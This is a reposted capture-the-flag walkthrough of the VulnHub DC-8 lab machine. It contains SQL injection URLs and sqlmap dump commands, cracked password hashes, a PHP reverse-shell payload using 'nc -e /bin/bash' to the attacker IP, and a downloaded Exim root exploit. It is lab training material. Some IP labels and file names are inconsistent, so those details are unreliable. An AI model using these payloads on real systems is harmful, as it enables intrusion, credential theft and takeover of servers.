vulnhub-DC8 target drone experiment

Database 2023-09-16 18:08:34 views: null

Vulnhub target drone download:

Target drone download

Official website address: https://download.vulnhub.com/dc/DC-8.zip
After downloading the target machine file, you can import it and use it. The target machine has only one flag value .
DC6 target machine IP address : 192.168.18.128
kali attack machine IP address :192.168.18.102

① Confidence collection

#扫描存活主机
arp-scan  -l
#nmap扫描开放端口信息
nmap -A -p- 192.168.18.102

Insert image description hereOpen port 22, 80we perform website login
Insert image description here observation URL, there may beSQL注入

#查询到数据库名字: d7db 
http://192.168.18.102/?nid=-1 union select database() --+

#查询数据库版本:10.1.26-MariaDB-0+deb9u1
http://192.168.18.102/?nid=-1 union select version() --+

Manual injection reference link DC8 Manual injection of SQL at the shooting range

directory scan

dirsearch  --url http://192.168.18.102

Insert image description hereUser login address http://192.168.18.102/user/login
data explosion

sqlmap -u http://192.168.18.102/?nid=1 --dbs 
sqlmap -u http://192.168.18.102/?nid=1 -D  d7db
sqlmap -u http://192.168.18.102/?nid=1 -D  d7db -T  users --columns
sqlmap -u http://192.168.18.102/?nid=1 -D  d7db -T  users -C name,pass --dump
cat pass 
admin:$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
john:$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

Insert image description here

②Password blasting

john pass

Insert image description hereUsername johnand password turtleto log in
Insert image description here

③Rebound shell

Click- Content>Click- edit>Click- WEBFORMS>Click- Form settings>Click the drop-down box to selectPHP code
Insert image description hereInsert image description here

Thanks for taking the time to contact us. We shall be in contact soon.

<?php system("nc -e /bin/bash 192.168.18.128 1234"); ?>

Insert image description here

kali攻击机进行监听1234端口  
nc -nlvp 1234
#浏览器中点击任意`Submit`按钮即可实现连接

Insert image description here

④User privilege escalation

#连接shell
python -c 'import pty;pty.spawn("/bin/bash")'
find  / -perm  -u=s  -type f 2>/dev/null

Insert image description hereSearch for related vulnerabilities searchsploit exim
Insert image description here

cp /usr/share/exploitdb/exploits/linux/local/46996.sh 666.sh
cat 666.sh
cp 666.sh  /var/www/html
vi  666.sh
#在最后一行插入set  ff=unix,进行保存

transmission

#kali机上
service apache2 start
#连接的dc8
cd /tmp
wget  http://192.168.18.128/66.sh

Insert image description here

chmod 777 666.sh  #给权限
ls -l
./666.sh  -m netcat

Insert image description here

⑤Get ​​flag

cd /root
cat flag.txt

Insert image description here

Guess you like

Origin blog.csdn.net/m0_64118193/article/details/128168121
Recommended
Apache Doris version 2.0.10 is officially released!
Open Source Daily | Big models go to war; big model unicorns are revealed to be selling themselves; Zhou Hongyi suggests that Google open source all its products; the largest open source AI community provides $10 million to share GPUs
Ranking
JS inheritance and monitoring
[ProblemSolving][Ubuntu][LyX] The selected document class ... requires external files that are not available...
Java threads sharing static variable
balancap/SSD-Tensorflow使用及训练预测自己的数据集
Detailed core ES6
JS --- reverse traversal achieved Array array, the array is connected string
How to Uninstall (or Reinstall) Windows 10’s Ubuntu Bash Shell
Linux modify the hostname method
Charging Specification BC v1.2
node的性能和java对比分析
Daily
More
2024-05-17(6)
2024-05-16(23)
2024-05-15(5)
2024-05-14(9)
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)

Code World

© 2018 codetd.com